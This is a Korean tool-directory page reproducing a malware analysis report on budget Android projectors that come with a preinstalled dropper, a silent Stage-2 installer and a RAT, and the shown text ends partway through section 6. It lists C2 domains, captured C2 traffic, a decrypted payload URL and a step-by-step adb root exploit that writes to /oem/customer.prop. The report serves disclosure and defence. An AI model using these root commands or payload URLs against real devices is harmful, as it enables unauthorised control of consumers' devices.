Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Android-Projector-C2-Malware — 중국 beamers의 C2 네트워크 분석 - SilentSDK-Analysis | Kitploit
도구/GitHubGitHub/kavan00/android-projector-c2-malware
Android SecurityEmbedded Systems SecurityIndicator of Compromise (IOC) ManagementIoT SecurityNetwork ForensicsReverse EngineeringMalware AnalysisDigital ForensicsCommand and Control

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Threat Intelligence
Supply Chain Security
Firmware Analysis
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

중국 beamers의 C2 네트워크 분석 - SilentSDK-Analysis

저장소 보기
182655개월 전아직 검토되지 않음

안드로이드 프로젝터에 사전 설치된 C2 인프라 및 RAT 페이로드

기술 분석 보고서 — 보안 연구


영향을 받는 기기: Nonete(예: Model HY260Pro)와 같은 빔 브랜드의 여러 안드로이드 프로젝터(아마도 Magcubic, Hotack, Huyukang 등 여러 제품도 포함, 이들 회사는 유사한 모델을 유통하며 이를 뒷받침하는 징후가 있음)
칩셋 플랫폼: Allwinner H713 / sun50iw12p1 — 이 플랫폼의 모든 기기에 영향을 미칠 가능성 있음
분석 기간: 2026년 4월 11일–17일
분류: 사전 설치된 명령 및 제어 인프라 및 원격 접근 트로이 목마 페이로드


TL;DR

  • 문제: 현재 Amazon, eBay, AliExpress에서 대량 판매 중인 수많은 저가 안드로이드 프로젝터(잠재적으로 Magcubic, Hotack 등 Allwinner H713 칩을 사용하는 브랜드)가 공장에서 바로 맬웨어에 감염되어 있음(공급망 공격, "BADBOX" 사례와 유사).
  • 메커니즘: 무해해 보이는 시스템 앱("StoreOS")이 위장된 드로퍼(dropper) 역할을 함. 백그라운드에서 완전히 은밀하게 "SilentSDK"라는 Stage-2-드로퍼를 다운로드하여 최대 시스템 권한으로 설치하며, 이는 다시 모듈식, 플러그인 기반, 아키텍처 인식 RAT 및 잠재적 피싱 프레임워크를 설치함.
  • 위험 요소: 맬웨어는 중국(api.pixelpioneerss.com)에 C2 연결을 설정하고, 민감한 기기 ID를 추출하며, 루트 권한으로 언제든지 추가 악성 코드를 다운로드하고 실행할 수 있음(chmod 777). 또한 기기에는 공개된 루트 백도어가 존재함.
  • 즉시 완화 조치: C2 도메인(특히 *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net)을 네트워크 수준에서 차단해야 함. 영향 받은 사용자는 ADB를 통해 수동으로 악성 앱을 비활성화할 수밖에 없으며, 이 앱들은 시스템에 깊이 내장되어 있음.

긴급 공지

이 보고서에 문서화된 맬웨어 인프라는 현재 Amazon, eBay, AliExpress에서 최종 소비자에게 대량 판매 중인 안드로이드 프로젝터에 사전 설치되어 있습니다. 영향 받는 기기는 여러 브랜드명(Hotack, Huyukang, Magcubic, Nonete 등)에 걸쳐 있을 수 있습니다. 동일한 C2 인프라는 동일 제조업체의 다른 기기에서도 독립적으로 확인되었습니다(섹션 13 참조). 이 패턴은 BADBOX 사례와 일치합니다.


목차

  1. 기기 식별
  2. 조사 워크플로우
  3. 루트 액세스 — 익스플로잇 경로
  4. C2 서버 응답 — 핵심 증거
  5. 맬웨어 생태계 개요
  6. StoreOS — 드로퍼 분석 (com.htc.storeos)
  7. EventUploadService — 원격 측정 (com.htc.eventuploadservice)
  8. ExpandSDK — 광고 삽입 (com.htc.expandsdk)
  9. SilentSDK — Stage-2-드로퍼 분석 (com.hotack.silentsdk)
  10. 맬웨어
  11. 시스템 백도어
  12. 네트워크 포렌식
  13. 기기 스푸핑 (빌드 지문 스푸핑)
  14. 외부 확인
  15. 침해 지표 (IOC)
  16. MITRE ATT&CK 매핑
  17. 즉시 완화 조치
  18. 출처

구매한 기기: Amazon 링크 - Nonete Mini Beamer 4K 1080P


1. 기기 식별

속성값
브랜드명Nonete HY260Pro (여러 회사에서 판매하는 모델)
내부 모델명NT10
SoCAllwinner sun50iw12p1 (ARM 32비트)
운영체제SpectraOS (Android 11, 커널 5.4.99)
실제 빌드 지문Allwinner/h713_tuna_p3/h713-tuna_p3:11
스푸핑된 빌드 지문ADT-3/adt3/adt3:11/RP1A.201005.006
SELinux허용 모드 (강제 없음)
플랫폼 서명 키공개 AOSP 테스트 키
OEM 인증서CN=蓝鲨, OU=www.bsh.me, C=CN
펌웨어 채널HY260Pro_SpectraOS_TPYB

범위 참고: Allwinner H713 칩셋은 유럽 시장에서 판매되는 수많은 저가 안드로이드 프로젝터에 내장되어 있으며, 브랜드명이 자주 변경됩니다. 동일한 펌웨어 베이스(h713_tuna_p3)와 동일한 C2 운영자(Shenzhen Aodin Technology)는 이 OEM의 모든 기기에 동일한 인프라가 포함되어 있음을 강력히 시사합니다.


2. 조사 워크플로우

단계작업결과
1Wireshark로 네트워크 트래픽 캡처store-api.aodintech.com으로의 HTTP 트래픽
2gzip 압축 C2 응답 디코딩7개의 앱, 숨겨진 "SilentTools" 포함
3AES-CBC로 다운로드 경로 복호화키 [편집됨], .bpp 파일 URL
4/oem/customer.prop을 통한 루트 익스플로잇속성 주입 후 uid=0(root)
5/data, /oem, /system 포렌식 덤프APK, 데이터베이스, 구성 파일
6StoreOS DEX 정적 분석pm install -r -d, 바이트 반전 보호
7reverseLen 메커니즘 리버스 엔지니어링안티 분석 보호 이해
8바이트 반전 보호 해제복호화되어 분석 가능한 SilentSDK DEX
9SilentSDK 문자열 XOR 복호화C2 도메인 api.pixelpioneerss.com 확인
10세 출처에 걸친 해시 검증MD5/SHA-256 완전 일치
11맬웨어 다운로드 프로세스 리버스 엔지니어링서버가 여전히 온라인 상태
12맬웨어 리버스 엔지니어링플러그인 기반 RAT 프레임워크

3. 루트 액세스 — 익스플로잇 경로

루트 액세스는 세 가지 취약점의 조합을 통해 달성되었습니다:

  1. SELinux 허용 모드 — 접근 위반이 기록될 뿐 차단되지 않음.
  2. 전역 쓰기 가능 /oem — 파티션이 fmask=0000으로 FAT 마운트됨.
  3. 부팅 시 customer.prop 로드 — 시스템 속성을 덮어씀.```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**영향:** 물리적 접근 권한이 있는 모든 사용자 또는 동일 네트워크에 있는 공격자(ADB를 통해, 포트 5555 열림, 인증 없음)는 전체 루트 액세스를 획득합니다.

---

## 4. C2 서버 응답 — 핵심 증거

### 캡처된 HTTP 요청```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

서버 응답 (pcapng에서 디코딩된 - 테이블)

gzip 압축된 응답에는 7개의 앱이 포함된 JSON 목록이 있습니다. 그중 6개는 일반 스트리밍 앱(YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere)입니다. 일곱 번째는 SilentTools입니다:

앱패키지isShowisForceisSilent InstallisSilent Uninstall실행 유형
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1

SilentTools 구성 상세```json

{ "name": "SilentTools", "pkg": "com.hotack.silentsdk", "desc": "Special app", "icon": "http://cdn-store.aodintech.com/com.hotack.silentsdk/image/95630a5e-e05e-4dba-814a-cf2742585b39.png", "category": "htc", "zone": "Global", "developer": "htc", "isForce": true, "verCode": 4, "verName": "2509041614", "verDesc": "SilentSDK", "installType": 0, "appType": "apk", "reverseLen": 63995, "path": "W15UOdzUbX72/67VLbV2cMLetfnsudxCpedAqw2GjJ8pvLI56S0gTzrp4HaetoVK3PdHXvM9vw7g+F4eFGhHDNvARfeM38tkcqo7gOpulNCb1gKYE2rmjWa+6RdjhB84+g403UUicBfFf5vHDoOEgA==", "size": 2474873, "md5": "5df097591d6942bae4eff33a37c4e28f", "upDate": "2025-09-04", "isShow": false, "isSilentInstall": false, "isSilentUninstall": true, "isBootStartup": false, "launchType": 1, "launchParam": "com.hotack.silentsdk.MyService" }

**플래그 해석:**

- `isShow: false` — 앱이 스토어 인터페이스에 나타나지 않음.
- `isForce: true` — 액션(설치 또는 업데이트)을 강제로 수행하는 것으로 추정됨.
- `isSilentUninstall: true` — 사용자 상호작용 없이 스스로 제거 가능.
- `launchType: 1` — 백그라운드 서비스를 자동으로 시작함.
- `launchParam: MyService` — 지속적인 서비스에 대한 참조.
- `zone: "Global"` — 전 세계의 모든 기기를 대상으로 함.
- `reverseLen` — SilentSDK `.apk`를 복원하는 데 필요한 바이트 길이.

### 암호화된 다운로드 경로

`path` 필드는 AES-CBC로 암호화되어 있습니다:

- **키/IV:** `[REDACTED]` (AES-CBC, Raw) -> 기기의 ChannelID.
- **복호화 결과:**```text
http://cdn-store.aodintech.com/com.hotack.silentsdk/package/091acbf1-68b1-40f1-b9b7-7d4d6ae86880.bpp

참고: 파일 확장자 .bpp는 방화벽을 우회하기 위해 사용되며, 실행 중에는 파일 이름이 .apk로 변경됩니다. 이 캡처에서 isSilentInstall 필드는 false입니다. isForce: true의 정확한 의미는 디컴파일된 코드에서 명확하게 재구성할 수 없었습니다. 해당 값이 서버 측에서 동적으로 true로 설정될 가능성도 배제할 수 없습니다.


5. 멀웨어 생태계 개요

이 장치에는 상호 작용하는 네 개의 시스템 앱이 포함되어 있으며, 모두 AOSP 테스트 키로 서명되고 UID 1000(System)으로 실행됩니다:```text ┌──────────────┐ │ DEVICE BOOT │ └──────┬───────┘ ┌────────────────┼────────────────┐ ▼ ▼ ▼ ┌─────────────┐ ┌─────────────┐ ┌──────────────┐ │ StoreOS │ │ SilentSDK │ │ EventUpload │ │ DROPPER │ │ RAT │ │ HEARTBEAT │ └──────┬──────┘ └──────┬──────┘ └──────┬───────┘ ▼ ▼ ▼ store-api. api.pixel event-api. aodintech.com pioneerss.com aodintech.com

   + ExpandSDK (Ad-Injection)
     → pb-api.aodintech.com
---

## 6. StoreOS — 드로퍼 분석

StoreOS는 자동으로 설치되는 앱 스토어처럼 보이지만, 드로퍼(dropper) 기능을 수행합니다.  
**패키지:** `com.htc.storeos`  
**SHA-256:** `3476536a5c722b9e34c53abda766fb4869d5ebebfc9c8a8fd47fb7ecd5f025b9`  
**VirusTotal:** BitDefender: `Android.Riskware.TestKey.rB`

### 권한
도구 다운로드